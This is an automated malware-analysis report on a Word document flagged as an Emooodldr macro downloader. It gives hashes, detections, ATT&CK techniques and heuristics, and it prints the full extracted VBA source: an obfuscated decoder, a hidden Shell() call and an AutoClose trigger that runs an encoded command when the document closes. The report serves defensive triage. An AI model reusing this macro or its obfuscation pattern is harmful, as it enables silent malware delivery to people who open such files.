Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 c097751002442abb…

MALICIOUS

Office (OOXML)

33.4 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-05-10
MD5: b53ef9daae55e9850bd5c41f7ef4ea38 SHA-1: f4e221406d2339df73b44edb795e426b8024ee93 SHA-256: c097751002442abbcb8c85e5df07d64fae35c03789a4dfe364ffd3b5496891b4
244 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OOXML document containing VBA macros, specifically an Auto_Close macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary code upon opening or closing. The ClamAV detection name 'Doc.Malware.Emooodldr-6711604-0' strongly suggests the Emooodldr family, known for its macro-based download capabilities. The VBA script's obfuscated nature and use of Shell() point to it downloading and executing a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2458 bytes
SHA-256: 0adea8464d25f4b64b1c8abf1615a054f9c2ced4c195122bec4ba83b10a869fa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function elevare(buffone As Integer) As String
 Dim gilda() As Variant
 gilda = Array(")", "4", "z", "3", "$", "D", ";", "j", "N", "H", "V", "1", "u", "'", "C", "A", "?", "+", "n", "O", "\", "l", "/", "a", "g", "e", "o", "s", "f", "m", "r", "8", "2", " ", "W", "b", ":", "=", "F", "w", "y", "P", "v", "E", "I", "T", "p", "h", ".", "B", "Y", "i", "-", "d", "(", "t", "c", "X", "x", ",", "S")
 Dim villano As Integer
 
 For villano = LBound(gilda) To UBound(gilda)
   If villano = buffone Then
    elevare = gilda(villano)
   End If
 Next
 
End Function

Function pesatore(ingrosso As String)
    ingrosso = StrConv(ingrosso, vbUnicode)
    pesatore = Split(Left(ingrosso, Len(ingrosso) - 1), vbNullChar)
End Function

Function gazzella(massaia As String) As String
  Dim inter As Integer
  Dim enfasi As String
  Dim recupero As Variant
  recupero = pesatore(Trim(massaia))
  For villano = 0 To Len(massaia)
  
    If (villano + 1) <= UBound(recupero) Then
    Dim ortensia As String
    ortensia = recupero(villano)
    villano = villano + 1
    ortensia = ortensia + recupero(villano)
    
    enfasi = enfasi + elevare(Int(ortensia))
    End If
  Next
  
  gazzella = enfasi
End Function

Public Function calmo(scomparto As String)
  Shell scomparto, 0
End Function

Sub AutoClose()
 Call Application.Run("calmo", gazzella("56295348255825332256334626392530274725212133524358255633494046232727335208264133521426292923185333540825395219350725565533604027552529480825554834253514215125185500480526391821262353385121255413475555463622222323185325252418232523184048562629221851182622271246253056482953281359330425184236154141051545153317331320095502501012482558251300063360552330555241302656252727330425184236154141051545151320095502501012482558251306335408253952193507255655336040275525294808255548342535142151251855004805263918212623536055305118245413475555463622222323185325252418232523184048562629222748464746165153372712462530561300063344435754540825395219350725565533604027552529480825554834253514215125185500480526391821262353605530511824541347555546362222031148113101483203014811013122274846474613000006"))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: a5e21761f760756de9d78fa35ffd79bc1edb1291eec004b61bb0076a15b663c5
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).